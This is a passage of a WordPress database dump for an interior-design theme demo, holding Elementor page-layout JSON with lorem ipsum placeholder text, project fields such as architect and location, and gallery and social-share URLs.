sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2199,4644,'_elementor_page_assets','a:0:{}'),(2200,4644,'_thumbnail_id','1161'),(2201,4644,'_wxr_import_has_attachment_refs','1'),(2202,4645,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2203,4645,'ova_project_service','Interior design'),(2204,4645,'ova_project_architect','Mike hardson'),(2205,4645,'ova_project_duration','4.5 Months'),(2206,4645,'ova_project_location','Broklyn, New York'),(2207,4645,'_elementor_edit_mode','builder'),(2208,4645,'_elementor_template_type','wp-post'),(2209,4645,'_elementor_version','3.6.6'),(2210,4645,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/richard-rogers/\";}}'),(2211,4645,'_wp_page_template','default'),(2212,4645,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Richard Rogers\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2213,4645,'_elementor_page_assets','a:0:{}'),(2214,4645,'_thumbnail_id','1163'),(2215,4645,'_wxr_import_has_attachment_refs','1'),(2216,4646,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2217,4646,'ova_project_service','Interior design'),(2218,4646,'ova_project_architect','Mike hardson'),(2219,4646,'ova_project_duration','4.5 Months'),(2220,4646,'ova_project_location','Broklyn, New York'),(2221,4646,'_elementor_edit_mode','builder'),(2222,4646,'_elementor_template_type','wp-post'),(2223,4646,'_elementor_version','3.6.6'),(2224,4646,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:89:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:96:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:104:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:90:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/cozy-living-room/\";}}'),(2225,4646,'_wp_page_template','default'),(2226,4646,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cozy living room\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially 